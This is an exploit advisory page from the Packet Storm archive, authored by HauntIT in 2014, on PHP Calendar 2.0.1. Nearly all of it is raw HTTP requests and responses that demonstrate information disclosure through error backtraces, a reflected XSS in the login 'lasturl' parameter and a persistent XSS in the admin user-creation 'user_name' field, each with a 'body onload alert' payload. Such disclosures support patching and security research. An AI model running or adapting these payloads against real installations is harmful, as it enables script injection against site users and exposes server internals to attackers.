exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

PHP Calendar 2.0.1 XSS / Information Disclosure

PHP Calendar 2.0.1 XSS / Information Disclosure
Posted Feb 27, 2014
Authored by HauntIT

PHP Calendar version 2.0.1 suffers from multiple cross site scripting and information disclosure vulnerabilities.

tags | exploit, php, vulnerability, xss, info disclosure
SHA-256 | d2a72263079a61bd29ed5e7830991d421fa3083c72d80bbfeee5123fb35db2d3

PHP Calendar 2.0.1 XSS / Information Disclosure

Change Mirror Download
# ==============================================================
# Title ...| PHP Calendar Multiple vulnerabilities
# Version .| php-calendar-2.0.1.zip
# Date ....| 27.02.2014
# Found ...| HauntIT Blog
# Home ....| http://sourceforge.net
# ==============================================================

[+] As guest

# ==============================================================
# 1. Information disclosure bug

---<request>---
GET /k/cms/phpcalendar/php-calendar-2.0.1/index.php?action='`"%3b--#%%2f%2a&year=2014&month=1&day=28 HTTP/1.1
Host: 10.149.14.62
---<request>---

---<response>---
<pre>#0 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/calendar.php(676): soft_error('Invalid action')
#1 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/calendar.php(626): do_action()
#2 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/index.php(76): display_phpc()
#3 {main}</pre>
---<response>---



# ==============================================================
# 2. XSS

---<request>---
POST /k/cms/phpcalendar/php-calendar-2.0.1/index.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Type: application/x-www-form-urlencoded
Content-Length: 104

lasturl='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&action=login&submit=Log+in&username=admin&password=asd
---<request>---



# ==============================================================
# 3. Information disclosure bug

---<request>---
POST /k/cms/phpcalendar/php-calendar-2.0.1/index.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 132

action=search&phpcid=1&searchstring=asdasd&search-from-date='`"%3b--#%%2f%2a&search-to-date=02%2F21%2F2014&sort=start_date&order=ASC

---<request>---


---<response>---
<div class="phpc-main"><h2>Error</h2>
<p>Malformed "search-from" date: "\'`\";--#%/*"</p>
<h3>Backtrace</h3>
<pre>#0 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/calendar.php(843): soft_error('Malformed "sear...')
#1 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/search.php(31): get_timestamp('search-from')
#2 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/search.php(129): search_results()
#3 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/calendar.php(680) : eval()'d code(1): search()
#4 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/calendar.php(680): eval()
#5 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/includes/calendar.php(626): do_action()
#6 /home/k/public_html/cms/phpcalendar/php-calendar-2.0.1/index.php(76): display_phpc()
#7 {main}</pre>
---<response>---

# ==============================================================
# [+] From admin logged-in

# ==============================================================
#4. Persistent XSS

---<request>---
POST /k/cms/phpcalendar/php-calendar-2.0.1/index.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 197

phpc_token=ALRTjtU1Qnv0LMm1G_BeiQSEUyGGHPYGrGMk8L6sfaI&action=user_create&submit_form=submit_form&submit=Submit&user_name='%3e"%3e%3cbody%2fonload%3dalert(123123)%3e&password1=aaaaa&password2=aaaaa
---<request>---



# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close